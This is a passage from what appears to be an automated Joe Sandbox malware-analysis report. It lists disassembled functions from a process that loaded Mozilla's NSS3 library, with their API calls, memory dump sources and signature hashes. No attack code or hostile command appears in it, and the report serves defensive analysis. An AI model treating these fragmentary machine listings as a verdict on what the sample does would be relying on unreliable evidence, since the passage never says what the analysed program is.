                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                          • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                          • API String ID: 601260978-871931242
                                                                                                                                                                                          • Opcode ID: 13319a6da5ec76b105cb08586b7a9f892512d60789cf0a4672338a8b203c0d0e
                                                                                                                                                                                          • Instruction ID: e4ca4879d8fd386300c1c1c11861c6252d0945f0e19b4a4156afe52e7962b527
                                                                                                                                                                                          • Opcode Fuzzy Hash: 13319a6da5ec76b105cb08586b7a9f892512d60789cf0a4672338a8b203c0d0e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11E4F6E1315292DB156E332C409AE399C5BC200CF280539E819D2F41FB25DA1A8EFA
                                                                                                                                                                                          Function 6C5A0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(*,Zl), ref: 6C5A0C81
                                                                                                                                                                                            • Part of subcall function 6C58BE30: SECOID_FindOID_Util.NSS3(6C54311B,00000000,?,6C54311B,?), ref: 6C58BE44
                                                                                                                                                                                            • Part of subcall function 6C578500: SECOID_GetAlgorithmTag_Util.NSS3(6C5795DC,00000000,00000000,00000000,?,6C5795DC,00000000,00000000,?,6C557F4A,00000000,?,00000000,00000000), ref: 6C578517
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A0CC4
                                                                                                                                                                                            • Part of subcall function 6C58FAB0: free.MOZGLUE(?,-00000001,?,?,6C52F673,00000000,00000000), ref: 6C58FAC7
                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5A0CD5
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C5A0D1D
                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C5A0D3B
                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C5A0D7D
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C5A0DB5
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A0DC1
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C5A0DF7
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A0E05
                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5A0E0F
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C557F4A,00000000,?,00000000,00000000), ref: 6C5795E0
                                                                                                                                                                                            • Part of subcall function 6C5795C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C557F4A,00000000,?,00000000,00000000), ref: 6C5795F5
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C579609
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C57961D
                                                                                                                                                                                            • Part of subcall function 6C5795C0: PK11_GetInternalSlot.NSS3 ref: 6C57970B
                                                                                                                                                                                            • Part of subcall function 6C5795C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C579756
                                                                                                                                                                                            • Part of subcall function 6C5795C0: PK11_GetIVLength.NSS3(?), ref: 6C579767
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C57977E
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C57978E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                          • String ID: *,Zl$*,Zl$-$Zl
                                                                                                                                                                                          • API String ID: 3136566230-830518008
                                                                                                                                                                                          • Opcode ID: a9d60acc0a35fd24c7534e2ed6e02bd681561f9f7243c0de216ce8fb55d51b1e
                                                                                                                                                                                          • Instruction ID: ec96604ef5ac2edc4592f65f5914aeb1f23ecfdd56f69df9119c9b019cf0c102
                                                                                                                                                                                          • Opcode Fuzzy Hash: a9d60acc0a35fd24c7534e2ed6e02bd681561f9f7243c0de216ce8fb55d51b1e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A4122B2901245ABEB009FA2DC81BAF7674EF8431CF000125E91667B41E735AE59CBF2
                                                                                                                                                                                          Function 6C596CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C661DE0,?), ref: 6C596CFE
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C596D26
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C596D70
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000480), ref: 6C596D82
                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C596DA2
                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C596DD8
                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C596E60
                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C596F19
                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C596F2D
                                                                                                                                                                                          • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C596F7B
                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C597011
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C597033
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C59703F
                                                                                                                                                                                          • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C597060
                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C597087
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C5970AF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2108637330-0
                                                                                                                                                                                          • Opcode ID: 9ae9983a0016147b6885fb452c70b052d2081497a9545922359b944923794011
                                                                                                                                                                                          • Instruction ID: d6fa123655fa2f62fa194d376dfba54178d01e78b3aa25366cb60a77c44bff30
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ae9983a0016147b6885fb452c70b052d2081497a9545922359b944923794011
                                                                                                                                                                                          • Instruction Fuzzy Hash: CDA127719053819BEB408F24CC95B6B32A4DB8130CF2449BAE929CBB95EB75D85CC7D3
                                                                                                                                                                                          Function 6C55AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55AF25
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55AF39
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55AF51
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55AF69
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C55B06B
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C55B083
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C55B0A4
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C55B0C1
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C55B0D9
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C55B102
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C55B151
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C55B182
                                                                                                                                                                                            • Part of subcall function 6C58FAB0: free.MOZGLUE(?,-00000001,?,?,6C52F673,00000000,00000000), ref: 6C58FAC7
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C55B177
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55B1A2
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55B1AA
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55B1C2
                                                                                                                                                                                            • Part of subcall function 6C581560: TlsGetValue.KERNEL32(00000000,?,6C550844,?), ref: 6C58157A
                                                                                                                                                                                            • Part of subcall function 6C581560: EnterCriticalSection.KERNEL32(?,?,?,6C550844,?), ref: 6C58158F
                                                                                                                                                                                            • Part of subcall function 6C581560: PR_Unlock.NSS3(?,?,?,?,6C550844,?), ref: 6C5815B2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4188828017-0
                                                                                                                                                                                          • Opcode ID: b9a02729d1bae0f68f268ccbe2e63514c41cb18922e8dc6050b8221e5ed5d651
                                                                                                                                                                                          • Instruction ID: 9cc4a80ad53cb0bc8a3446bb849b9255712a90f2550c5eae27f1a3cb51748805
                                                                                                                                                                                          • Opcode Fuzzy Hash: b9a02729d1bae0f68f268ccbe2e63514c41cb18922e8dc6050b8221e5ed5d651
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9A1D1B5D00206EBEF00AF64DC85AEE77B4EF49308F544126E805A7752E731E969CBE1
                                                                                                                                                                                          Function 6C552C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(#?Ul,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552C62
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552C76
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552C86
                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552C93
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552CC6
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552CDA
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23), ref: 6C552CEA
                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?), ref: 6C552CF7
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?), ref: 6C552D4D
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C552D61
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C552D71
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C552D7E
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207AD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207CD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207D6
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4B204A), ref: 6C5207E4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,6C4B204A), ref: 6C520864
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C520880
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,6C4B204A), ref: 6C5208CB
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208D7
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                          • String ID: #?Ul
                                                                                                                                                                                          • API String ID: 2446853827-1060960515
                                                                                                                                                                                          • Opcode ID: e6a6826d1020fd69c14607a4b81a7fd7ca8409aa50c01b289398414a49bed40c
                                                                                                                                                                                          • Instruction ID: 0c60ebe7d6fc73749ed086435dbc7a302de0da8d65ffb48a4f400fbf05ff5169
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6a6826d1020fd69c14607a4b81a7fd7ca8409aa50c01b289398414a49bed40c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5751F3B6D00205FBDB00AF24DC858AA77B8AF59358F448521EC1997B12E731ED68CBE1
                                                                                                                                                                                          Function 6C5AAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5AADB1
                                                                                                                                                                                            • Part of subcall function 6C58BE30: SECOID_FindOID_Util.NSS3(6C54311B,00000000,?,6C54311B,?), ref: 6C58BE44
                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5AADF4
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5AAE08
                                                                                                                                                                                            • Part of subcall function 6C58B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6618D0,?), ref: 6C58B095
                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5AAE25
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C5AAE63
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C5AAE4D
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: TlsGetValue.KERNEL32(?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4C97
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CB0
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CC9
                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5AAE93
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C5AAECC
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C5AAEDE
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C5AAEE6
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5AAEF5
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C5AAF16
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                          • API String ID: 3441714441-3315324353
                                                                                                                                                                                          • Opcode ID: 058cd1636064a35547129e39a8a8fbf248e80666b71acd8892c0109f2a9daca7
                                                                                                                                                                                          • Instruction ID: b43be75135c9dabe1ef37087365ab42a3f55bbc4c4e03573238559cca8262a0e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 058cd1636064a35547129e39a8a8fbf248e80666b71acd8892c0109f2a9daca7
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5412BB6804210A7E7209AA6DC85BBF32A89F8671CF100525E81496F41FB35990ECEE7
                                                                                                                                                                                          Function 6C548DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?), ref: 6C548E22
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C548E36
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C548E4F
                                                                                                                                                                                          • calloc.MOZGLUE(00000001,?,?,?), ref: 6C548E78
                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C548E9B
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C548EAC
                                                                                                                                                                                          • PL_ArenaAllocate.NSS3(?,?), ref: 6C548EDE
                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C548EF0
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C548F00
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C548F0E
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C548F39
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C548F4A
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C548F5B
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C548F72
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C548F82
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1569127702-0
                                                                                                                                                                                          • Opcode ID: 1000015ca5aa619d1f335bbf251d275cdc0faff09341b08ce3a3f3b954c77bc9
                                                                                                                                                                                          • Instruction ID: 18f743ea118703c86e8e68b43e749cda64c48e69c921f64ccb82040467444764
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1000015ca5aa619d1f335bbf251d275cdc0faff09341b08ce3a3f3b954c77bc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: E051D1B2E00211AFEB00DF68CC8496AB7B9EF45358B15C52AEC08DB700E731ED4587E6
                                                                                                                                                                                          Function 6C57EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C57EE0B
                                                                                                                                                                                            • Part of subcall function 6C590BE0: malloc.MOZGLUE(6C588D2D,?,00000000,?), ref: 6C590BF8
                                                                                                                                                                                            • Part of subcall function 6C590BE0: TlsGetValue.KERNEL32(6C588D2D,?,00000000,?), ref: 6C590C15
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C57EEE1
                                                                                                                                                                                            • Part of subcall function 6C571D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C571D7E
                                                                                                                                                                                            • Part of subcall function 6C571D50: EnterCriticalSection.KERNEL32(?), ref: 6C571D8E
                                                                                                                                                                                            • Part of subcall function 6C571D50: PR_Unlock.NSS3(?), ref: 6C571DD3
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C57EE51
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C57EE65
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C57EEA2
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C57EEBB
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C57EED0
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C57EF48
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C57EF68
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C57EF7D
                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C57EFA4
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C57EFDA
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C57F055
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C57F060
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
